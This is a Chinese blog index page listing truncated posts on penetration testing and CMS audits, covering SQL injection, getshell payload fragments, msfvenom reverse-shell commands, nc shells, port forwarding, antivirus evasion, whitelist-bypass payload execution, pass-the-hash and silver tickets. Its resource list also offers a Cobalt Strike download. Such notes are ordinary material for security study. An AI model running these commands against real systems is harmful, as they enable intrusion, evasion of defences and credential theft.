自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

cxk

cxk

  • 博客(57)
  • 资源 (6)
  • 收藏
  • 关注

原创 爬某博客

import reimport requestsfrom bs4 import BeautifulSoupimport timerequests.packages.urllib3.disable_warnings()headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \ ...

2019-11-17 22:15:22 239

原创 一次渗透

注入1)网站首页2)简单and 1=1 ,1=2判断注入点3)order by 确定字段数为9,显示位union select 1,2…判断为4和84)判断权限root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...

2019-08-12 22:45:20 720 1

原创 s-cms后台getshell

重装导致任意代码执行代码分析在install.php中判断data/first.txt中值是否为0在后台存在任意txt文件修改(此处不分析代码,系统自带)将0改为任意值再看install.php142-163行将获取到的数据库信息进行连接,当成功后就进行数据库信息写入。此处仅需绕过数据库写入与conn.php文件引号的逃逸。既只用在数据库名处填写3333;#”);phpinf...

2019-08-12 11:05:41 602

原创 特征码简单修改学习

修改字符串大小写法使用C32打开程序,选中然后name小型变为大写等价替换法(相似指令替换)XOR EAX, EAXXOR EAX, EAXJE 10000418改为:XOR EAX, EAXJz 10000418通用跳转法将特征码换到空区域,在跳转回来跳走跳回...

2019-08-09 00:08:23 2266

原创 加花的简单学习

目标getpass1)使用zeroadd进行简单的加区2)使用_LordPE_fix定位加区位置,与文件入口3)使用OD进行简单加花,保存4) 更改入口点5)保存运行6)不科学的过了火绒。。。使用360被报毒...

2019-08-08 01:01:05 213

原创 baiyicms的一次审计

下载安装好后,在admin->controller->file.php文件的edit方法中,使用allowEditor过滤后缀,判断是否可写入跟进函数,发现html,css,js,txt文件可写入下面判断又为false,即可写入html,css,js,txt文件又因为该cms使用了模板引擎加载,既模板的html文件会被渲染为php执行,造成了任意代码执行。漏洞演示:登...

2019-08-04 16:15:51 541

原创 对hsycms的一次审计

非最新版本前台注入在common.php的32行,直接进行sql查询搜索prevNext方法哪里被调用,在show.php的38被调用,可看到传入参数跟进ID,在其第10行跟进input方法使用其方法传参且无过滤,导致ID可控,存在注入。漏洞利用python.exe .\sqlmap.py -u http://q.com/product/132 -D hsycms -T s...

2019-08-02 22:50:39 1152 1

原创 一次简单手工注入

一次简单的手工注入注入点http://xxx/news.php?newsid=18收集了下IP,不能sqlmap了,就只能手工了。1)确定注入点。经典 and 1=1 1=22)简单的order by 确定字段数。一直报错,感觉是被过滤了,后面使用注释符也不行使用union select 1,2,3也报错,确定不了字段数。3)尝试报错注入成功payload:union ...

2019-07-29 21:23:49 280

原创 一次失败的审计

项目地址https://www.douphp.com/DouPHP v1.5 Release 20190711工具:phpstudy+navicat+Seay源代码审计系统+PhpStorm项目目录审计注入首先在product.php的19行,看到使用request接受id与unique_id跟进get_legal_id方法判断ID是否为数字,is_unique_id无法找...

2019-07-22 15:17:34 197

原创 记录一次TP框架开发学习

之前自己看了php基础就去审计,发现很多方法都不知道,审计呢也是审计不出洞,知识还没到位,便去看了TP框架开发,有助于审计的学习。项目地址https://www.php.cn/course/332.html开发工具JetBrains PhpStorm+navicat+phpstudy+tp3.2.3流程简介0X00 tp3.2.3介绍目录index.php 入口文件README...

2019-07-18 16:04:23 229

原创 记一次免杀webshell的工具使用及powershell的编码

原项目地址https://github.com/yzddmr6/webshell-venom简单使用python py.py > test.phpD盾查杀(检验是否免杀的唯一标准)目前仅支持asp.aspx.php。but asp的免杀效果较差。笔者开始使用的是powershell,但是生成的shell并不能使用,后面发现是powershell的编码原因。用ps生成的...

2019-07-16 21:53:37 1459

原创 GreatSCT使用

GreatSCT简介GreatSCT目前得到了@ConsciousHacker的支持,该项目名为Great SCT(Great Scott)。Great SCT是一个用于生成应用程序白名单绕过的开源项目。此工具适用于红队和蓝队。它是一种用来生成Metasploit payload的工具,可绕过常见的防病毒解决方案和应用程序白名单解决方案。项目地址:https://github.com/Grea...

2019-07-11 14:12:02 552

原创 某公众号之图片反弹shell(标题党)

某公众号之图片反弹shell具体公众号猜吧,哈哈哈哈原项目地址https://github.com/peewpw/Invoke-PSImage攻击机 kali 192.168.5.102靶机 win10 192.168.0.311)生成一个msf ps1脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5....

2019-07-04 13:01:05 707 2

原创 ngrok的使用

ngrok的使用地址http://www.ngrok.cc1)开通隧道2)生成msf payload,使用ngrok的地址与端口生成payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.com LPORT=10842 -f exe> shell.exe3)启动ngrok客户端,msf启动ngrok....

2019-07-02 17:01:42 716

原创 EW使用

EW使用靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.1021)ew 自身的各个选项用途说明-l 指定要监听的本地端口-d 指定要反弹到的机器 ip-e 指定要反弹到的机器端口-f 指定要主动连接的机器 ip-g 指定要主动连接的机器端口-t 指定超时时长,默认为 10002)执行正向转发在k...

2019-07-02 15:53:17 8691

原创 portfwd使用

一款内置于msf的工具靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.102先配置msf,并反弹会话转发,把win7 3389转发到kali的33333端口portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389使用win10 远程桌面功能访问kali的52端口,既访...

2019-07-01 16:23:14 2155

原创 lcx使用

lcx使用win7 192.168.5.101win 10 192.168.0.31kali 192.168.5.102lcx本机: lcx -listen 2222 33332222为转发端口,3333为本机任意未被占用的端口肉鸡:lcx -slave 2.2.2.2 2222 127.0.0.1 33892.2.2.2 为本机IP,2222为转发端口,127.0.0.1为肉鸡内...

2019-07-01 16:03:39 672 1

原创 NC使用

NC使用win7 192.168.5.101win 10 192.168.0.31kali 192.168.5.102传文件win 7 接受(要先启动)nc -lp 52 >3.txtwin10传送nc -nv 192.168.5.101 52 < 3.txt弹shellkali 先启动nc -vv -l -p 52win 10nc 192....

2019-07-01 16:02:21 232

原创 office简单钓鱼与cve2017-11882

office简单钓鱼与cve2017-11882cve2017-11882靶机 windows07攻击机 kali1)先下载msf payload与py生成的wordmsf payloadhttps://github.com/0x09AL/CVE-2017-11882-metasploit路径cve_2017_11882.rb 放在usr/share/metasploit-fra...

2019-06-28 15:26:23 522

原创 winodws计划任务

权限维持-windows计划任务目录0x00 靶机0x01 实战0x02 问题0X00 靶机windows 2K3IP 192.168.5.187账户密码 administrator 1234560x01实战A1)本机win+r打开远程桌面连接,输入靶机地址192.168.5.187,并输入账户密码登录2)点击右下角的开始-控制面板-任务计划3)任务计划向导,下一步...

2019-06-27 15:16:56 179

原创 smb中继攻击

简单来说就是中间人攻击,窃取凭证这里简单示范攻击机kali 192.168.5.102靶机 win7192.168.5.155kali配置如下靶机执行dir \\192.168.5.102\c$无法弹回shell,不知道为什么,但已能获取到hash。即可pth利用较简单,重点是如何进行欺骗。...

2019-06-13 15:41:37 1088 1

原创 域渗透之银票据学习

银票据(silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。0x01 银票据利用条件域控计算机账户的ntlm hash域中的sid值一台域中主机与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。0x02 实战环境域控2k3,ip:192.168.5...

2019-06-10 14:12:52 1090

原创 python学习之exp整合

python学习之exp整合将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能使用方法python demo.py "url"# -*- coding:utf-8 -*-import urllibimport urllib.requestimport requestsimport osimport hashlib#import test.pyimport ...

2019-06-10 10:45:28 960

原创 python学习之ecshop exp编写

python学习之ecshop exp编写针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。# -*- coding:utf-8 -*-import requestsimport timedef ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...

2019-06-04 22:56:49 489

原创 内网渗透之PTH

PTH (pass-the-hash)pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。pass the hash原理:在Windows系统中,通常会使用NTLM身份认证NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonU...

2019-06-03 15:34:27 3132

原创 python学习之phpcms exp编写

python学习之phpcms exp编写针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。# -*- coding:utf-8 -*-import reimport stringimport requestsimport randomimport timedef getshell(host): try: ...

2019-05-28 15:50:17 457

原创 python学习之dedecms exp编写

python学习之dedecms exp编写针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。exp# -*- coding:utf-8 -*-import requestsimport timedef dada(url): url_index=url+"/install/index.php" headers = {"...

2019-05-24 09:54:09 714

原创 帝国cms7.5漏洞复现

EmpireCMS v7.5后台任意代码执行分析目录一.漏洞简介二.漏洞复现三.原理分析一.漏洞简介EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。[影响版本] <=7.5[漏洞危害] 高[漏洞位置] /e/admin/admin/ebak/phome.php二.漏洞复现1 访问靶机192.168...

2019-05-10 15:56:10 24358 7

原创 对亮神基于白名单zipfldr.dll执行payload第十八季复现

0x00 zipfldr.dll简介:zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。0x01 环境攻击机 kali 192.168.5.102靶机 win7 192.168.5.101装有av0x02复现攻击机靶机rundll32.exe zipfldr.dll,RouteTheCall shellcode.exe弹回0x03 sh...

2019-05-06 22:17:39 292

原创 对亮神基于白名单Url.dll执行payload第十七季复现

0x00 Url.dll简介:url.dll是Internet快捷壳扩展相关应用程序接口系统文件。攻击机: 192.168.5.100 kali靶机: 192.168.5.157 Windows 7

2019-05-06 22:07:24 349

原创 对亮神基于白名单ftp执行payload第十九季复现

0x00 Ftp.exe简介:Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。0x01 环境攻击机 kali 192.168.5.102靶机 win7 192.168.5.101装有av0x02复现攻击机,注意配置set AutoRunScript migrate f靶机echo !C:\Users\administrator\Des...

2019-05-06 22:03:29 303

原创 对亮神基于白名单 Cmstp.exe 执行 payload 第十六季复现

待补充…

2019-05-06 14:26:21 264

原创 对亮神基于白名单Pcalua执行payload第十五季复现

0x00 Pcalua 简介:Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。0x01 环境攻击机 kali 192.168.5.100靶机 win7 192.168.5.101装有av0x02复现攻击机靶机shell弹回0x03 shellcode.exemsfvenom -a x86 --platfor...

2019-05-06 12:46:25 298

原创 对亮神基于白名单Forfiles 执行 payload 第十四季复现

0x00 Forfiles简介:Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。0x01 环境攻击机 kali 192.168.5.100靶机 win7 192.168.5.101装有av0x02复现攻击机靶机forfiles /p c:\windows\system32 /m cmd.exe /c ...

2019-05-06 12:26:20 291

原创 对亮神基于白名单 PsExec 执行 payload 第十三季复现

0x00 PsExec 简介:微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性0x01 环境攻击机 kali 192.168.5.100靶机 win7 192.1...

2019-05-06 12:09:04 333

原创 对亮神基于白名单odbcconf.exe执行payload第十二季复现

待补充…

2019-05-06 11:21:34 227

原创 对亮神基于白名单Rundll32.exe执行payload第十一季复现

待补充…

2019-05-06 11:04:08 487

原创 对亮神基于白名单Wmic 执行 payload 第十季复现

0x01 Wmic简介:WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之...

2019-05-03 21:06:53 426

原创 对亮神基于白名单Regsvr32 执行 payload 第九季复现

0x00 Regsvr32简介:Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...

2019-05-03 19:57:54 563

原创 对亮神基于白名单 Msiexec 执行 Payload 第八季复现

0x00 Msiexec 简介Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等0x01 环境攻击机kali 192.168.5.99靶机win7 192.168.5.112...

2019-05-03 19:26:57 379

最新仿icloud web管理,asp版本。欢迎学习交流。

最新仿icloud web管理,asp版本。欢迎学习交流。仅供学习参考。其他与本人无关

2022-08-19

myBase.exe

mybase版懂的人自然懂

2020-07-06

Cobalt Strike下载

cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。cs下载,懂得人自然懂。中文版。

2019-04-09

高项考试真题详解12年出版

2012年信息系统项目管理师考试重点考点难点暨历年真题解析资料

2018-01-04

历年真题分类解析

历年真题分类解析,软考高项学习资料之一,欢迎下载,111

2018-01-04

2015年信息系统项目管理师考试重点考点难点暨历年真题解析资料

2015年信息系统项目管理师考试重点考点难点暨历年真题解析资料

2018-01-04

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除